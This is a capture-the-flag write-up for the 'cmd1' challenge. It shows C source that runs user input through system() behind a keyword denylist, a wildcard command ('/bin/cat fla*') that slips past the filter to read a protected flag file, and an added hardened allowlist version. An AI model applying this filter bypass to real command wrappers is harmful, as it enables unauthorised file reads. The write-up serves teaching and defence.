cmd1

Question

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

Writeup

  • Source code

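    #include <stdio.h>
    #include <stdlib.h>   /* putenv(), system() */
    #include <string.h>
    
    /* Returns non-zero if cmd contains any forbidden substring. */
    int filter(char* cmd){
            int r=0;
            r += strstr(cmd, "flag")!=0;
            r += strstr(cmd, "sh")!=0;
            r += strstr(cmd, "tmp")!=0;
            return r;
    }
    int main(int argc, char* argv[], char** envp){
            /* Point PATH at a directory that does not exist. */
            putenv("PATH=/fuckyouverymuch");
            /* Exit quietly if the argument trips the filter. */
            if(filter(argv[1])) return 0;
            /* Otherwise hand the argument to the shell. */
            system( argv[1] );
            return 0;
    }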
    
  • First, the PATH environment variable is set to a path that does not exist, so the user can only run commands by giving their absolute path:
    putenv("PATH=/fuckyouverymuch");
    
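  • Next, the program reads the user-supplied string, which must not contain flag, sh, or tmp; otherwise it returns 0 immediately. So we need a way to bypass these strings: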
    r += strstr(cmd, "flag")!=0;
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    
  • Method 1: Wildcard
    • Running ./cmd1 "/bin/cat flag" just returns 0, because the argument contains flag
    • Use the wildcard * in place of the literal string flag:
      cmd1@ubuntu:~$ ./cmd1 "/bin/cat fla*"
      mommy now I get what PATH environment is for :)
      
  • Method 2: *
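
Why the wildcard gets through, as an added example in C (not part of the challenge source or the original writeup): system() hands the string to /bin/sh, which expands fla* only after filter() has inspected it, so the denylist never sees the word flag. The block puts the challenge's filter() next to an exact-match allowlist that runs the program with execv() and no shell; the ALLOWED paths and the helpers allowed_exact() and run_allowed() are hypothetical names chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Denylist from the challenge source: non-zero means "blocked". */
int filter(const char *cmd) {
    int r = 0;
    r += strstr(cmd, "flag") != NULL;
    r += strstr(cmd, "sh") != NULL;
    r += strstr(cmd, "tmp") != NULL;
    return r;
}

/* Hypothetical allowlist of exact absolute paths (an assumption). */
static const char *const ALLOWED[] = { "/bin/date", "/usr/bin/id" };

/* Returns 1 only when cmd is byte-for-byte an allowlisted path. */
int allowed_exact(const char *cmd) {
    for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++)
        if (strcmp(cmd, ALLOWED[i]) == 0)
            return 1;
    return 0;
}

/* Hardened: execv(), no shell. Returns exit status, or -1 if rejected/error. */
int run_allowed(const char *cmd) {
    if (cmd == NULL || !allowed_exact(cmd)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)cmd, NULL };
        execv(cmd, argv);   /* absolute path, so PATH is never consulted */
        _exit(127);         /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed sample inputs, not taken from the challenge host. */
    const char *s[] = { "/bin/cat flag", "/bin/cat fla*", "/bin/date" };
    for (size_t i = 0; i < sizeof s / sizeof s[0]; i++)
        printf("%-14s denylist:%s allowlist:%s\n", s[i],
               filter(s[i]) ? "block" : "pass",
               allowed_exact(s[i]) ? "pass" : "block");
    return 0;
}
```

The denylist also blocks harmless input such as /usr/bin/sha256sum, because the path contains sh, while the exact-match check depends only on the list contents.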
